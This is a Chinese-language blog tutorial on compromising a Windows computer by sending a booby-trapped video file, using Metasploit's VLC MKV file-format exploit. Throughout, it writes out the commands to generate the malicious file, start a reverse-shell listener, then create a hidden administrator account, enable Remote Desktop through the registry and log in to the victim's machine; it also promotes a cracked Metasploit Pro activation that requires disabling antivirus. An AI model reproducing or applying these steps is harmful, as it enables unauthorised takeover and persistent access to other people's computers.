视频教程
原理解释
其实就是使用了Reverse shell(反弹/反向shell),之前的一篇我们提供过详细的视频讲解以及利用方式
环境依赖
主要就是使用Metasploit渗透框架,下面是不同系统的具体玩法
Windows
之前,我们给热心网友准备了2022年最新的Windows Metasploit pro专业版激活教程,很多网友表示重启之后并未永久激活,请您检查是否关闭了杀毒软件同时不要修改安装路径,这两点做到了,是可以保证永久激活的,而且可以一直更新最新版本
Kali linux
如果使用的是kali linux,可以直接使用自带的社区版,kali linux的安装教程参考下面的文章
安卓系统
当然,你如果没有时间使用电脑
安卓手机可以通过安装Termux使用metasploit框架,参考我们社区中网友贡献的相关文章
更多玩法:
苹果系统
苹果手机可以通过在AppStore安装ISH Shell
- 安装完docker后运行metasploit
apk add --update docker openrc
docker run -d --name postgres postgres && docker start postgres
docker run -it --link postgres:db fcolista/alpine-metasploit
更多玩法:
使用方法
这里我们将主要代码写在下方,供大家参考
启动msfconsole
输入下面命令,以管理员身份启动metasploit渗透框架
sudo msfconsole
![图片[1]-黑客是如何通过发送一个视频来攻陷你的电脑?Metasploit入门-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220110161907681.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
查看vlc漏洞
search vlc
这里能看到我们要利用的是这个高危漏洞
![图片[2]-黑客是如何通过发送一个视频来攻陷你的电脑?Metasploit入门-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220110162004795.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
查看该漏洞的使用方法
先选择使用vlc_mkv
漏洞
use exploit/windows/fileformat/vlc_mkv
然后查看使用方法
show options
我们要使用下面的LHOST参数,接我们自己攻击者机器的IP地址(我这里是kali linux,因此要填kali linux的IP地址,下面教大家如何找kali linux的IP地址)
![图片[3]-黑客是如何通过发送一个视频来攻陷你的电脑?Metasploit入门-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220110162522264.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
你可以输入下面的命令,寻找本机的IP地址(不同系统玩法不一样,比如windows可能需要输入ipconfig
)
ip addr
我这里是192.168.244.128
,后面使用命令的时候就要写这个IP
![图片[4]-黑客是如何通过发送一个视频来攻陷你的电脑?Metasploit入门-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220110162920393.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
生成投递的视频文件
192.168.244.128是我局域网的IP地址,您需要填写自己的IP地址,当然如果是公网则需要填写公网的IP地址
set LHOST 192.168.244.128
exploit
这里可以看到已经生成完了,对应的文件路径也可以看到,存储在了/root/.msf4/local/
![图片[5]-黑客是如何通过发送一个视频来攻陷你的电脑?Metasploit入门-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220110163152866.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
开启监听端口
输入下面命令开启监听端口,等待接收者打开我们投递的视频文件
use exploit/multi/handler
set LHOST 192.168.244.128
exploit
我们这里要注意的是,每次输入use命令,使用漏洞的时候,均需要重新设置对应的IP地址,否则漏洞是用不了的!
![图片[6]-黑客是如何通过发送一个视频来攻陷你的电脑?Metasploit入门-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220110163516338.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后等待,windows电脑连接,然后我们就可以使用相关命令,去控制windows电脑了。
原理,我们之前讲过,其实就是Reverse Shell(反弹/反向shell)
细节补充
我们这里给大家再说一个小小的细节:
当连接成功后,如果对象是windows电脑我们可以输入下面的命令,先创建pigpig账户,密码123456
net user pigpig 123456 /add
然后给这个账户添加管理员权限
net localgroup administrators pigpig /add
最后,开放远程桌面端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
然后,使用Kali连接远程桌面,例如受害者的IP地址是192.168.244.128
(你可以用ipconfig
来查看)
rdesktop 192.168.244.129:3389
然后就可以连上电脑了,是不是还挺秀的?
![图片[7]-黑客是如何通过发送一个视频来攻陷你的电脑?Metasploit入门-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/01/20220110164057636.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
详细的玩法可以参考我们之前讲过的最经典的永恒之蓝漏洞攻略,同样也是使用metasploit渗透框架的典例之一!
更多经典漏洞案例
如果您还想了解更多经典漏洞案例,我们欢迎您观看下方的视频
- 最新
- 最热
只看作者